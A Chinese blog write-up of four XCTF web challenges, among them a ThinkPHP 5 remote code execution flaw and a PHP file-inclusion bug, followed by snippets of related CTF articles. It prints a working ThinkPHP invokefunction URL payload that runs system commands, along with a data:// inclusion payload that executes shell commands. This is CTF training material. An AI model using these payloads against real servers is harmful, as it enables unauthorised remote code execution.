攻防世界Web高手进阶区WP(1-4)

最新推荐文章于 2022-04-25 16:04:53 发布
最新推荐文章于 2022-04-25 16:04:53 发布
阅读量577 收藏 1
点赞数
分类专栏: web xctf CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/119043386
版权
本文介绍了四个关于Web安全的题目,涉及baby_web、robots协议、ThinkPHP RCE和PHP文件包含漏洞。解题过程中,利用了strstr函数不区分大小写的特性、data://协议等方法进行绕过,展示了如何通过命令执行和文件包含漏洞寻找并获取flag。
摘要由CSDN通过智能技术生成

目录

1.baby_web

在这里插入图片描述
题目描述中提到初始页面,一般都是 index.php
进入题目环境,可以看到是1.php
在这里插入图片描述
将1.php改成inex.php,然后发现页面直接跳转到1.php了

那就F12查看网页响应情况,再次访问index.php,然后发现确实访问index.php了,在返回的响应头中发现flag。
在这里插入图片描述

flag{very_baby_web}

2.Training-WWW-Robots

在这里插入图片描述
打开题目环境,一堆英文,看不懂
在这里插入图片描述
翻译一下
在这里插入图片描述
和之前新手练习区第二题一样,考察robots协议,直接访问 ip/robots.txt
在这里插入图片描述
可以看到flag的目录,访问此文件,获得flag
在这里插入图片描述

cyberpeace{e442a3f80b2efbcc5f1a47de16fc9f54}

3.php_rce

在这里插入图片描述
打开题目环境,给出了TinkPHP页面,可以看出ThinkPHP的版本
在这里插入图片描述
题目名为PHP_RCE,说明是让我们利用相关漏洞进行解题,我们去搜索一下这个版本的ThinkPHP存在什么漏洞
很容易找到这个版本存在远程代码执行漏洞,这个漏洞我在Vulocus漏洞上复现过,复现过程挺简单的,当然不牵扯到原理方面 [Vulfocus解题系列]ThinkPHP5 远程代码执行漏洞(CNVD-2018-24942)

简单来说就是利用构造好的url进行命令执行

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

执行的命令放在最后,这是执行ls命令的
在这里插入图片描述
然后我们直接找flag文件

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “flag*”

在这里插入图片描述
然后用cat命令查看flag

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

在这里插入图片描述

flag{thinkphp5_rce}

4.Web_php_include

在这里插入图片描述
根据题目判断,是一道文件包含的题
这个题我看了一个大佬的wp,写的特别好
攻防世界 web进阶区 web_php_include

打开题目环境,是一段PHP代码
在这里插入图片描述
首先要看懂这段代码的意思
第一个函数是让代码高亮的意识,关系不大
在这里插入图片描述
strstr() 查找字符串首次出现的位置。返回字符串剩余部分
在这里插入图片描述
php:// 属于PHP伪协议
1、php://filter
有一些敏感信息会保存在php文件中,如果我们直接利用文件包含去打开一个php文件,php代码是不会显示在页面上的,例如打开data目录下的config.php:
2、data://
利用data:// 伪协议可以直接达到执行php代码的效果,例如执行phpinfo()
3、zip:// 执行压缩文件
如果网站允许我们上传压缩文件,我们也可以将php文件压缩后进行上传,再通过zip://协议执行。
4、php://input
利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码

然后是str_replace()函数,作用是替换字符。会对page和php://进行比较,然后进行替换
在这里插入图片描述

解题思路一:利用strstr不区分大小写的特性来绕过它

因为strsr()函数是不区分大小写的,所以我们可以用大小写绕过的方式进行绕过,然后利用php伪协议来执行我们的代码。
在这里插入图片描述
猜测flag在 fl4gisisish3r3.php 中,用cat命令查看一下在这里插入图片描述
flag在源码中
在这里插入图片描述

解题思路二:利用data://协议绕过

既然php://的伪协议不行,我们可以换一种协议,利用data://协议进行绕过

data协议的一般格式为:
?page=data://text/plain,xxxxxxx (xxxxxx为要执行的命令)

?page=data://text/plain,<?php system('ls'); ?>

在这里插入图片描述
使用cat命令即可获得flag

攻防世界-web进阶)FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: 1.login.php 2.admin.php (还有一个robots.txt, 打开之后也是指向上面两个页面的) 先试一下admin.php,尝试几个密码登陆没有结果。 查看页面源代码 有提示,就先暂时先不考虑弱口令 打开另一个页面login.php 查看源代码,依旧有提示 按照提示转到login.php?debug页面 成功读取源代码 创建了一个SQLite3对象,查阅得知是一个数据库 在下面这句话里存在注入 参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
攻防世界 web高手进阶 10分题 biscuiti-300
闵行小鱼塘
11-07 1193
继续ctf的旅程,开始攻防世界web高手进阶10分题,本文是biscuiti-300的writeup
攻防世界web(高手wp
vegetable223的博客
11-28 311
baby_web 观察题目“baby_web”,感觉有什么深意,不管了,先打开环境 出现下面这个页面: 就一句“hello world”?,再一看网址,显示的URL是1.php。 再结合题目,豁然开朗,一般网站的初始页面都是index.php。在url中输入index.php,但是网页又自动跳转到1.php。 这时候想到利用burp抓包,如下图: 打开index.php这个 查看返回(Response) 发现flag静静的躺在这里。 Training-WWW-Robots 首先打开环境,看到一段英文
攻防世界-web -高手进阶-PHP2
热门推荐
wyj_1216 House
07-09 1万+
题目 writeup 首先发现源码泄露 /index.phps 查看源代码 即: <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($_GET[id] == "admin") { e...
攻防世界web wp
Wei_xino的博客
11-07 408
写在前面: 学习遇到了瓶颈,不知道怎么去参悟和实战很多东西,上不见天下不见地,有点茫然,有点恍惚。 view_source F12 get_post ? hackbar robots robots.txt bakeup index.php.bak 还有index.php~ index.phps cookie 看cookie disabled_button F12,把dis去掉 simple_js ...
攻防世界 web高手进阶 10分题 xss1
闵行小鱼塘
11-10 824
继续ctf的旅程,开始攻防世界web高手进阶10分题,本文是xss1的writeup
攻防世界 web高手进阶 10分题 url
闵行小鱼塘
10-19 1756
继续ctf的旅程,开始攻防世界web高手进阶10分题,本文是url的writeup
攻防世界web高手进阶wp-Confusion1
Whaocai的博客
08-03 373
考点:python ssti 点进去看到url是index.php,页面上有一张图片,蛇和象。我们都知道蛇代表php,大象代表python,猜测有关php+python的题 点击login和register,发现都报错。F12又发现了flag文件存放的位置,接下来就是考虑何如读取到该文件。 寻找别的信息,看看有没有robots.txt,发现没有该文件,御剑扫描也没扫出什么有用的信息。 ctf中出有关python的题型很大一部分是ssti,于是就尝试模板注入,发下确实存在ssti漏洞,这下就有思路来读取fla
攻防世界 web高手进阶 8分题 upload
闵行小鱼塘
08-28 525
继续ctf的旅程,开始攻防世界web高手进阶的8分题,本文是upload的writeup
攻防世界-web-WP
qq_63522478的博客
01-21 2213
攻防世界-web-新手答题 一、题目 1.view_source 2.robots 3.backup 4.cookie 5.disabled_button 二、解题思路 1.view_source 打开题目场景 根据题目描述查看源代码 查看网页源代码的方式一共有四种 (1)鼠标右键点击查看源代码 (2)Ctrl+U (3)Fn+F12(打开web开发者工具) (4)Shift+Ctrl+I(打开web开发者工具) 任选其一操作就看到了flag: .
攻防世界(web)高手进阶
doraemon12345的博客
12-01 235
1.baby_web 打开题目,题目描述提示想想初始页面,打开是1.php, 改成index.php,开发者模式,选择在网络模块打开看到index.php,查找发现flag flag{very_baby_web} 2.Training-WWW-Robots 看到题目想到robots.txt,尝试一下果然,看到fl0g.php 打开fl0g.php,拿到flag cyberpeace{27ec35e088ca35fa208f904330c15aad} 3.warmup 打开题目是个滑稽的表情,f12发现sou
xctf 攻防世界 web wp 高手进阶(持续更新中)
m0_55854679的博客
06-22 383
baby_web 点击题目链接,可以看到一个1.php的页面。 题目要求是查看初始页面,在url后面添加index.php【单一入口的应用程序就是说用一个文件处理所有的HTTP请求,例如不管是列表页还是文章页,都是从浏览器访问index.php文件,这个文件就是这个应用程序的单一入口。由于所有的http请求都由index.php接收,所以可以进行集中的安全性检查,如果不是单一入口,那么开发者就必须记得在每一个文件的开始加上安全性检查代码。工作都被集中到了index.php来完成,可以减轻我们维护其他功能代
攻防世界web进阶 部分WP baby_web&Training-WWW-Robots
qq_43474648的博客
05-20 465
攻防世界web进阶 部分WP baby_web&Training-WWW-Robots baby_web 这个就主要是抓个包: 通过提示信息了解到,要访问根目录,index.php。 打开burp建立链接,抓到包之后再target页面选中,摁下ctrl+r或者右键发送到reapeater。 这样做的原因是试过一下,直接在url里把1.php改成index.php是不行的。 所以需要在repeater里做对应的修改,然后go,获得flag。 Training-WWW-Robots 这个和新手
CTF_Web攻防世界高手进阶WP1-4
AFCC_的博客(Web_Dog)
08-06 1180
0x00 前言 Web高手进阶的题是对信息搜集、协议理解、php语法掌握等进阶知识的考查,越往后,题目越难,也不知道自己可以做到第几,持续更新吧。 0x01 baby_web 题目描述: 想想初始页面是哪个 打开之后发现初始路径为1.php,平常我们使用最常见的首页面为index.php,输入url测试,发现立即跳转到了1.php,本题目考察302跳转的知识,使用burp抓包跟进即可。 0x02 Training-WWW-Robots 根据题目名称可知本题考查robots.txt知识。 根据提示访问f
攻防世界Web高手进阶
xuhc25的博客
05-07 509
攻防世界Web高手进阶 文章目录1、aNNaNNaNNaN-Batman 1、aNNaNNaNNaN-Batman 题目: 下载下来得到附件,解压。 用txt打开 发现是一个JavaScript脚本。 看着有些乱码,试看看弹窗内容,把末尾的eval改成alert,然后后缀改为html。 双击浏览器打开,就能看到弹出内容。 这回看到是正经的代码了,整理得到如下代码。 function $(){ var e=document.getElementByld("c").value; if(e.
攻防世界-web高手进阶
zji
04-25 6811
文章目录攻防世界-web高手进阶一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界web高手进阶 Web_php_include
weixin_61835841的博客
04-25 2046
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 工具 火狐,burpsuite 分析 代码审计: strstr():分大小写 str_replace:替换函数 补充: 函数原型:mixed str_replace ( mixed $search , mixed $replace , mixed $subject [, int &$count ] )参数说明:$search要被搜索替换的字符串,$replace要替换搜索的字符串,$subject操作...
攻防世界——web高手进阶1~6)
weixin_52805837的博客
03-09 691
攻防世界——web高手进阶1~6) (1)baby_web1.根据提示,在url中输入index.php,发现打开的仍然还是1.php 2.打开火狐浏览器的开发者模式,选择网络模块,再次请求index.php,查看返回包,可以看到location参数被设置了1.php,并且得到flag (2)Training-WWW-Robots: 直接先访问robots.txt: 然后在url在输入/fl0g.php,得到flag (3)Web_python_template_injection: 首先构造/{
攻防世界---Web---新手模式---backup
最新发布
11-11
题目描述:在攻防世界Web新手模式中,有一道名为backup的题目。该题目要求找到备份文件并获取flag。可以通过访问http://your-ip/backup/来查看备份文件,但是需要密码才能访问。我们可以通过查看网页源代码或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值